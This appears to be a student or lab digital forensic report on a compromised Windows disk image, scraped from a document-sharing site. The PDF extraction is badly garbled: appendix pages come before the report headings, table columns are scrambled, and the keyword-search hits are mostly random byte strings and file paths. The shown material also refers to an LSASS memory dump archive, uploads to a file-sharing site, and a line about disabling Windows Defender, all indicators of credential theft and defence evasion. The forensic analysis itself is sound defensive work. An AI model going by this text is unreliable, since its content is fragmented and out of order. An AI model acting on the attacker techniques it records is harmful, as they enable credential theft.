[email protected]« oftEdge_8wekyb3d8bbwe/AC/#!
?subject='mystery lu 001/MicrosoftEdge/Cache/KBBFFLP4/mystery-lung-illness-linked-vaping-
health-officials-investigating-nearly-possible-cases[1].htm
[email protected]
T
a
Preview Source File
g
s
bruk gjerne e-post: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

gro sa: "hv
bruk gjerne e-post: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

gro sa: "hv e7da144/Alphabet.xml
Page 136/145
[email protected]
T
a
Preview Source File
g
s
rence.setstateasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.0
showerroronpinneddr _x64__8wekyb3d8bbwe/mso98imm.dll
reasonasync [local] /img_disk.raw/vol_vol7/Program

«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330
showerroronpinneddr .21365.0_x64__8wekyb3d8bbwe/mso98imm.dll
[email protected]
Ta
Preview Source File
gs
penssh.com lsetstat «[email protected]« /img_disk.raw/vol_vol7/Program

refusing %s request Files/OpenSSH/sftp-server.exe
m [email protected] «[email protected]« /img_disk.raw/vol_vol7/Program

server supports ext Files/OpenSSH/sftp.exe
[email protected]
Ta
Preview Source File
gs
997-98 luigi rizzo /img_disk.raw/vol_vol7/Windows/System32/drivers/rmcast.sys

(«[email protected]«)
997-98 luigi rizzo /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

(«[email protected]«) rmcast_31bf3856ad364e35_10.0.17763.1_none_4543b616e0146b6c/rmcast.s
ys
[email protected]
T
a
Preview Source File
g
s
oder continuar algu /

Page 137/145
T
a
Preview Source File
g
s
01/01/20000asunto a rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL

01/01/20000asunto a .DLL

01/01/20000asunto a bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXS
RES.DLL
[email protected]
T
a
Preview Source File
g
s
e-mailadres: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

píx_tà«[email protected] shared/ink/Alphabet.xml
«. 5° celsius
e-mailadres: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
píx_tà«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
«. 5° celsius da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
ust match accessors /img_disk.raw/vol_vol7/Program

«[email protected]«abilityru Files/WindowsApps/Microsoft.XboxApp_41.41.18001.0_x64__8
les0sa1130: wekyb3d8bbwe/XboxApp.dll
Page 138/145
[email protected]
T
a
Preview Source File
g
s
rmações por e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

eu vou ao z
rmações por e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb
eu vou ao z 1e7da144/Alphabet.xml
[email protected]
Preview
AppendixC
Remote Drive
Local path Remote path Tags
Network\ \\vmware-host\Shared Folders

Z
AppendixD
Web History
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
file:///C:/Users/Craig/Desktop/Procdump/lsass.zip 2020 Mi C /
-05- cro ra img_disk.raw/vol_vo
07 sof ig l7/Users/Craig/AppD
21:0 t ata/Local/Microsoft/
1:00 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
Page 139/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
file:///C:/Windows/system32/oobe/FirstLogonAnim.ht 2019 Mi Al /
ml -11- cro a img_disk.raw/vol_vo
06 sof n l7/Users/Alan/AppD
CST ge e/WebCacheV01.da
t
http://www.abc.net.au/ 2020 Mi www.a Al /
-05- cro bc.net. a img_disk.raw/vol_vo
07 sof au n l7/Users/Alan/AppD
t
https://edition.cnn.com/ 2020 Mi edition. Al /
-05- cro cnn.co a img_disk.raw/vol_vo
07 sof m n l7/Users/Alan/AppD
t
https://go.microsoft.com/ 2020 Mi go.micr Al /
-05- cro osoft.c a img_disk.raw/vol_vo
07 sof om n l7/Users/Alan/AppD
t
https://go.microsoft.com/fwlink/?LinkId=525773 2020 Mi go.micr Al /
-05- cro osoft.c a img_disk.raw/vol_vo
07 sof om n l7/Users/Alan/AppD
t
https://microsoftedgetips.microsoft.com/ 2020 Mi micros Al /
-05- cro oftedge a img_disk.raw/vol_vo
07 sof tips.mic n l7/Users/Alan/AppD
20:3 t rosoft.c ata/Local/Microsoft/
Page 140/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
7:52 Ed om Windows/WebCach
t
https://microsoftedgetips.microsoft.com/en-us/0? 2020 Mi micros Al /
source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
t
https://microsoftedgetips.microsoft.com/en-us/0? 2020 Mi micros Al /
t
https://microsoftedgetips.microsoft.com/en-us/? 2020 Mi micros Al /
t
https://microsoftedgewelcome.microsoft.com/ 2020 Mi micros Al /
-05- cro oftedge a img_disk.raw/vol_vo
07 sof welcom n l7/Users/Alan/AppD
20:3 t e.micro ata/Local/Microsoft/
7:50 Ed soft.co Windows/WebCach
CDT ge m e/WebCacheV01.da
t
https://microsoftedgewelcome.microsoft.com/redirect 2020 Mi micros Al /
/?source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
07 sof welcom n l7/Users/Alan/AppD
20:3 t e.micro ata/Local/Microsoft/
7:50 Ed soft.co Windows/WebCach
CDT ge m e/WebCacheV01.da
t
https://uploadfiles.io/ 2020 Mi uploadf Al /
Page 141/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
-05- cro iles.io a img_disk.raw/vol_vo

t
https://uploadfiles.io/hr4z39kn 2020 Mi uploadf Al /
t
https://uploadfiles.io/hr4z39kn 2020 Mi uploadf Al /
t
https://www.abc.net.au/ 2020 Mi www.a Al /
t
https://www.abc.net.au/ 2020 Mi www.a Al /
t
https://www.bing.com/ 2020 Mi www.bi Al /
-05- cro ng.com a img_disk.raw/vol_vo
Page 142/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=abc+net+australia&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=e031eb64486d4946c 07 sof n l7/Users/Alan/AppD
bdd4d96939ae686&sp=-1&pq=abc+net+&sc=8- 20:3 t ata/Local/Microsoft/
8&qs=n&sk=&cvid=e031eb64486d4946cbdd4d9693 8:29 Ed Windows/WebCach
9ae686 CDT ge e/WebCacheV01.da
t
q=abc+net+australia&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=e031eb64486d4946c 07 sof n l7/Users/Alan/AppD
bdd4d96939ae686&sp=-1&pq=abc+net+&sc=8- 20:3 t ata/Local/Microsoft/
8&qs=n&sk=&cvid=e031eb64486d4946cbdd4d9693 8:29 Ed Windows/WebCach
9ae686 CDT ge e/WebCacheV01.da
t
q=cnn&qs=n&form=QBRE&sp=-1&pq=&sc=1- -05- cro ng.com a img_disk.raw/vol_vo
0&sk=&cvid=C664B0F2B90F4FA4BD840FF24D5A8 07 sof n l7/Users/Alan/AppD
AB9 20:3 t ata/Local/Microsoft/
t
q=cnn&qs=n&form=QBRE&sp=-1&pq=&sc=1- -05- cro ng.com a img_disk.raw/vol_vo
0&sk=&cvid=C664B0F2B90F4FA4BD840FF24D5A8 07 sof n l7/Users/Alan/AppD
AB9 20:3 t ata/Local/Microsoft/
t
q=nn&form=EDGSPH&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=8742925aa25c41d88 07 sof n l7/Users/Alan/AppD
a2af27f59a747eb&sp=-1&pq=&sc=0- 20:3 t ata/Local/Microsoft/
0&qs=n&sk=&cvid=8742925aa25c41d88a2af27f59a 8:15 Ed Windows/WebCach
747eb CDT ge e/WebCacheV01.da
t
q=nn&form=EDGSPH&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
Page 143/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
au&httpsmsn=1&plvar=0&refig=8742925aa25c41d88 07 sof n l7/Users/Alan/AppD

a2af27f59a747eb&sp=-1&pq=&sc=0- 20:3 t ata/Local/Microsoft/
0&qs=n&sk=&cvid=8742925aa25c41d88a2af27f59a 8:15 Ed Windows/WebCach
747eb CDT ge e/WebCacheV01.da
t
q=washington+post&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=aa1423938e1c46ff87 07 sof n l7/Users/Alan/AppD
6b6160ca84022b&sp=1&pq=wash&sc=8- 20:3 t ata/Local/Microsoft/
4&qs=EP&sk=PRES1&cvid=aa1423938e1c46ff876b 8:40 Ed Windows/WebCach
6160ca84022b&cc=US&setlang=en-US CDT ge e/WebCacheV01.da
t
q=washington+post&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=aa1423938e1c46ff87 07 sof n l7/Users/Alan/AppD
6b6160ca84022b&sp=1&pq=wash&sc=8- 20:3 t ata/Local/Microsoft/
4&qs=EP&sk=PRES1&cvid=aa1423938e1c46ff876b 8:40 Ed Windows/WebCach
6160ca84022b&cc=US&setlang=en-US CDT ge e/WebCacheV01.da
t
https://www.cnn.com/ 2020 Mi www.c Al /
-05- cro nn.com a img_disk.raw/vol_vo
t
https://www.msn.com/ 2020 Mi www.m Al /
-05- cro sn.com a img_disk.raw/vol_vo
t
https://www.washingtonpost.com/ 2020 Mi www.w Al /
-05- cro ashingt a img_disk.raw/vol_vo
07 sof onpost. n l7/Users/Alan/AppD
20:3 t com ata/Local/Microsoft/
Page 144/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
r o g
sed l am a
r m s
e m
e ai
e
r n
t
https://www.washingtonpost.com/
Page 145/145

Intelligence Report Final

Uploaded by

Copyright:

Available Formats

Intelligence Report Final

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Intelligence Report Final

Uploaded by

Copyright:

Available Formats

What steps should be taken after receiving a case for investigation?

What steps should be taken after receiving a case for investigation?

What tools will be used for the technical analysis?

What tools will be used for the technical analysis?

Forensic Analysis Intelligence Report

ABOUT THIS REPORT

Date Engaged 11-APRIL-2021

Forensic Investigator ALI BABA

Checking image integrity

Fig 1.0. shows the hash value comparison

Fig 1.2. The image details is being shown.

How the computer was compromised

Fig 1.2. shows the content of the boot directory.

Fig 1.4. A deleted image in the contrast-black folder.

From The Sleuth Kit istat Tool:

MFT Entry Header Values:

$STANDARD_INFORMATION Attribute Values:

From The Sleuth Kit istat Tool:

MFT Entry Header Values:

$STANDARD_INFORMATION Attribute Values:

Fig 1.9 document that was used to compromise the user

# Disable Windows Defender features in real time

q[9me!b9 o17how@pg /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-

q[9me!b9 o17how@pg /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

p checksum offlhoad «%[email protected]« /

ult micros -windows «[email protected]« /

,l va$e7 +xr, g" s «- /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

,l va$e7 +xr, g" s «- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

*~ _a=6) ;g(2 )lcim /img_disk.raw/vol_vol7/Windows/Fonts/msjhbd.ttc

*~ _a=6) ;g(2 )lcim /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

l) ]0n0 n(&h) 0k0v0 /

l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/System32/IME/IMEJP/IMJPDCT.EXE

l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/SysWOW64/WindowsCodecsRaw.dll

j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/System32/WindowsCodecsRaw.dll

j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

h axdx ta8i( >@830 .«[email protected]«- /

ttrehe)\ wow6 video/«[email protected]« /

t 0513110 832 ggif@«[email protected]« /

z b)d\\4 k00] /img_disk.raw/vol_vol7/Windows/Fonts/seguihis.ttf

z b)d\\4 k00] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-font-

bgpe,_,8on b>9yl;4 /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-

bgpe,_,8on b>9yl;4 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ea.$ z cz@, z2"z5# /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

ea.$ z cz@, z2"z5# /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

7 \@7!\@ a[@lt )am$ /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

7 \@7!\@ a[@lt )am$ /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

bob jenkins, 1996. /img_disk.raw/vol_vol7/Windows/Help/en-US/credits.rtf

bob jenkins, 1996. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

h}j 5sb1c !%)=cld <^«8- /img_disk.raw/vol_vol7/Windows/Fonts/msjhl.ttc

h}j 5sb1c !%)=cld <^«8- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

k7(@cv(@k alpo wa66 /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

k7(@cv(@k alpo wa66 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

haar e-mail /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

haar e-mail /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

/signature> </xrml> /img_disk.raw/vol_vol7/Windows/SysWOW64/winmsipc.dll

/signature> </xrml> /img_disk.raw/vol_vol7/Windows/System32/winmsipc.dll

/signature> </xrml> /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-